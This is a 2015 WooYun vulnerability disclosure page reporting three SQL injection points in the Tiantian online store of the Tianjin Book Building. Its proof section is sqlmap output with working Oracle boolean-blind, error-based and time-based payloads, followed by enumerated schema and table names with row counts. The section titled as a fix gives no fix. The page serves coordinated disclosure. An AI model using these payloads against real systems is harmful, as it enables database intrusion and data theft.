当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146021

漏洞标题:天津图书大厦网上商城天添网存在漏洞三处sql注入打包

相关厂商:天添网

漏洞作者: 路人甲

提交时间:2015-10-12 09:41

修复时间:2015-11-30 16:08

公开时间:2015-11-30 16:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-16: 厂商已经确认,细节仅向厂商公开
2015-10-26: 细节向核心白帽子及相关领域专家公开
2015-11-05: 细节向普通白帽子公开
2015-11-15: 细节向实习白帽子公开
2015-11-30: 细节向公众公开

简要描述:

rt

详细说明:

http://**.**.**.**/icarttw/getSpxx.action?flid=1725&page=1&type=4


http://**.**.**.**/icarttw/getInfo.action?splx=1&spxxid=755026091&type=1


http://**.**.**.**/icarttw/listwsjg.action?zz=&cbsmc=&flags=&flag=10&flagc=&fxflid=0205060000&page=1


漏洞证明:

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: flid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flid=1725 AND 5169=5169&page=1&type=4
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: flid=1725 AND 3922=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(122)||CHR(98)|
|CHR(120)||CHR(113)||(SELECT (CASE WHEN (3922=3922) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122
)||CHR(107)||CHR(118)||CHR(113)||CHR(62))) FROM DUAL)&page=1&type=4
    Type: AND/OR time-based blind
    Title: Oracle OR time-based blind
    Payload: flid=1725 OR 9646=DBMS_PIPE.RECEIVE_MESSAGE(CHR(75)||CHR(113)||CHR(80)||CHR(68),5)&page
=1&type=4
---
[17:00:34] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[17:00:34] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart
to database names on other DBMSes
[17:00:34] [INFO] fetching database (schema) names
[17:00:34] [INFO] the SQL query used returns 17 entries
[17:00:34] [INFO] resumed: COLLEGE
[17:00:34] [INFO] resumed: CTXSYS
[17:00:34] [INFO] resumed: DBSNMP
[17:00:34] [INFO] resumed: DMSYS
[17:00:34] [INFO] resumed: EXCHANGE
[17:00:34] [INFO] resumed: EXFSYS
[17:00:34] [INFO] resumed: MDSYS
[17:00:34] [INFO] resumed: OLAPSYS
[17:00:34] [INFO] resumed: ORDSYS
[17:00:34] [INFO] resumed: OUTLN
[17:00:34] [INFO] resumed: SCOTT
[17:00:34] [INFO] resumed: SYS
[17:00:34] [INFO] resumed: SYSMAN
[17:00:34] [INFO] resumed: SYSTEM
[17:00:34] [INFO] resumed: TSMSYS
[17:00:34] [INFO] resumed: WMSYS
[17:00:34] [INFO] resumed: XDB
available databases [17]:
[*] COLLEGE
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXCHANGE
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB


修复方案:

Database: EXCHANGE
+----------------------------+---------+
| Table                      | Entries |
+----------------------------+---------+
| JT_WEBG_GYSSPMX            | 3078001 |
| JT_WEBG_CGSHMX             | 2372075 |
| JT_UPDATEUSERLOG_0904      | 2059741 |
| JT_J_SPXX                  | 1793627 |
| JT_J_SPXXSJBACK            | 1717493 |
| XWQ_JT_J_SPXX_KC           | 1415286 |
| JT_WEBG_GYSSPTZ            | 1401730 |
| JT_J_SPXX_TP               | 1243834 |
| XWQ_JT_J_SPXX              | 1201511 |
| JT_WEBG_JTDMX              | 1151380 |
| JT_J_SPXX20110512          | 912994  |
| JT_J_SPXX_2010_12_29       | 867858  |
| JT_J_SPXX_2010_12_30       | 867858  |
| HW_SPXX                    | 761691  |
| JT_J_SPXX_0201             | 739357  |
| SYSLOG                     | 609675  |
| TJBB_XSDMX                 | 401943  |
| JT_J_SPXX_KC               | 390605  |
| JT_WEBK_XSDMX              | 374935  |
| TJBB_FHDMX                 | 364540  |
| XWQ_SPXX2                  | 337555  |
| JT_WEBG_CGSH               | 331392  |
| TJBB_UPLOAD_TEMP_PRODUCTS  | 320666  |
| JT_C_BMSPKFMX              | 198512  |
| JT_J_SPXX_BM               | 174326  |
| JT_C_BMSPKFTZ              | 168233  |
| JT_UPDATEUSERLOG0908       | 166571  |
| T_LLJL                     | 166402  |
| TJBB_ZTSP                  | 165042  |
| JKXX_TJBB_XSDMX_BACK       | 157905  |
| TJBB_XSZFRZ                | 153807  |
| JT_WEBK_KHSPTZ             | 150463  |
| TJBB_MANAGEDBLOG           | 130362  |
| JT_J_SJHIS                 | 114881  |
| JT_WEBG_JTD                | 114732  |
| JT_J_SPXX_BACK             | 111700  |
| TJBB_XSD                   | 105876  |
| JT_J_SPXX_SPJJ             | 99378   |
| TJBB_FHD                   | 94804   |
| JT_UPDATEUSERLOG_0903      | 83098   |
| TJBB_USERSXK               | 77755   |
| TJBB_DXFSRZ                | 72353   |
| TJBB_YXHD_PRODUCTS         | 68317   |
| TJBB_USER                  | 66300   |
| HASSENDSMS                 | 45537   |
| T_SCJ                      | 36115   |
| JT_WEBK_USER               | 36000   |
| JT_WEBG_CGDMX              | 34597   |
| TJBB_DDSHR                 | 31556   |
| TJBB_FJDH                  | 28527   |
| TJBB_XSDQXTZ               | 22703   |
| JT_WEBK_GGDJXX             | 22258   |
| TEMP_RXSP1                 | 21285   |
| T_SHDZ                     | 20598   |
| JT_WEBG_GYSJSDMX           | 19914   |
| T_SHDZTMP                  | 18144   |
| TJBB_DTKRZ                 | 17562   |
| TJBB_KZSXNR                | 16852   |
| CHECK_LOGIN                | 16678   |
| T_GWC                      | 15086   |
| TJBB_TKRZ                  | 14112   |
| TJBB_DTK                   | 13994   |
| SPXX_TGTEMP                | 13512   |
| JT_WEBK_SPXXREVIEW         | 12321   |
| JT_WEBK_PHFLMX             | 11284   |
| RT_SXK_RZ                  | 10701   |
| TEMP_BY_WXD_1              | 10694   |
| JT_WEBG_CGSHCC             | 9828    |
| SYS_IMPORT_FULL_01         | 8979    |
| JT_WEBK_ROOMSPMX           | 8621    |
| JT_WEBK_KHDDMX             | 8565    |
| JT_J_SPXX_20110320         | 8517    |
| SYS_EXPORT_SCHEMA_84       | 7821    |
| TEMP_SPXX1                 | 7809    |
| SYS_EXPORT_SCHEMA_83       | 7641    |
| SYS_EXPORT_SCHEMA_82       | 7514    |
| SYS_EXPORT_SCHEMA_81       | 7479    |
| SYS_EXPORT_SCHEMA_80       | 7374    |
| SYS_EXPORT_SCHEMA_79       | 7225    |
| SYS_EXPORT_SCHEMA_78       | 7213    |
| SYS_EXPORT_SCHEMA_77       | 7190    |
| SYS_EXPORT_SCHEMA_76       | 7172    |
| SYS_EXPORT_SCHEMA_75       | 7167    |
| SYS_EXPORT_SCHEMA_74       | 7158    |
| SYS_EXPORT_SCHEMA_73       | 7153    |
| SYS_EXPORT_SCHEMA_72       | 7143    |
| SYS_EXPORT_SCHEMA_71       | 7100    |
| SYS_EXPORT_SCHEMA_69       | 7072    |
| SYS_EXPORT_SCHEMA_70       | 7070    |
| SYS_EXPORT_SCHEMA_68       | 7057    |
| SYS_EXPORT_SCHEMA_67       | 7050    |
| SYS_EXPORT_SCHEMA_66       | 7048    |
| SYS_EXPORT_SCHEMA_65       | 7037    |
| SYS_EXPORT_SCHEMA_64       | 7028    |
| SYS_EXPORT_SCHEMA_63       | 7017    |
| SYS_EXPORT_SCHEMA_57       | 7015    |
| SYS_EXPORT_SCHEMA_62       | 7008    |
| SYS_EXPORT_SCHEMA_59       | 7002    |
| SYS_EXPORT_SCHEMA_61       | 7000    |
| SYS_EXPORT_SCHEMA_60       | 6992    |
| SYS_EXPORT_SCHEMA_58       | 6982    |
| SYS_EXPORT_SCHEMA_56       | 6960    |
| SYS_EXPORT_SCHEMA_55       | 6944    |
| SYS_EXPORT_SCHEMA_54       | 6936    |
| SYS_EXPORT_SCHEMA_53       | 6928    |
| SYS_EXPORT_SCHEMA_52       | 6920    |
| SYS_EXPORT_SCHEMA_51       | 6911    |
| SYS_EXPORT_SCHEMA_50       | 6905    |
| SYS_EXPORT_SCHEMA_49       | 6898    |
| SYS_EXPORT_SCHEMA_48       | 6883    |
| SYS_EXPORT_SCHEMA_47       | 6861    |
| SYS_EXPORT_SCHEMA_46       | 6853    |
| SYS_EXPORT_SCHEMA_45       | 6847    |
| SYS_EXPORT_SCHEMA_44       | 6840    |
| SYS_EXPORT_SCHEMA_43       | 6835    |
| SYS_EXPORT_SCHEMA_42       | 6827    |
| SYS_EXPORT_SCHEMA_41       | 6820    |
| SYS_EXPORT_SCHEMA_40       | 6812    |
| SYS_EXPORT_SCHEMA_39       | 6804    |
| SYS_EXPORT_SCHEMA_38       | 6797    |
| SYS_EXPORT_SCHEMA_37       | 6789    |
| SYS_EXPORT_SCHEMA_36       | 6781    |
| SYS_EXPORT_SCHEMA_35       | 6772    |
| SYS_EXPORT_SCHEMA_34       | 6763    |
| SYS_EXPORT_SCHEMA_33       | 6756    |
| SYS_EXPORT_SCHEMA_32       | 6749    |
| SYS_EXPORT_SCHEMA_31       | 6739    |
| SYS_EXPORT_SCHEMA_30       | 6731    |
| SYS_EXPORT_SCHEMA_29       | 6725    |
| SYS_EXPORT_SCHEMA_28       | 6717    |
| TJBB_WXD_GHSSP             | 6642    |
| TJBB_WXD_QCKC              | 6562    |
| TJBB_WXD_SPXX              | 6559    |
| TJBB_SPXX                  | 6553    |
| SYS_EXPORT_SCHEMA_27       | 6511    |
| SYS_EXPORT_SCHEMA_26       | 6503    |
| SYS_EXPORT_SCHEMA_25       | 6471    |
| JT_WEBG_CGD                | 6464    |
| SYS_EXPORT_SCHEMA_24       | 6463    |
| SYS_EXPORT_SCHEMA_22       | 6442    |
| SYS_EXPORT_SCHEMA_21       | 6434    |
| SYS_EXPORT_SCHEMA_20       | 6427    |


版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-10-16 16:07

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发对应分中心,由其后续协调网站管理单位处置。

最新状态:

暂无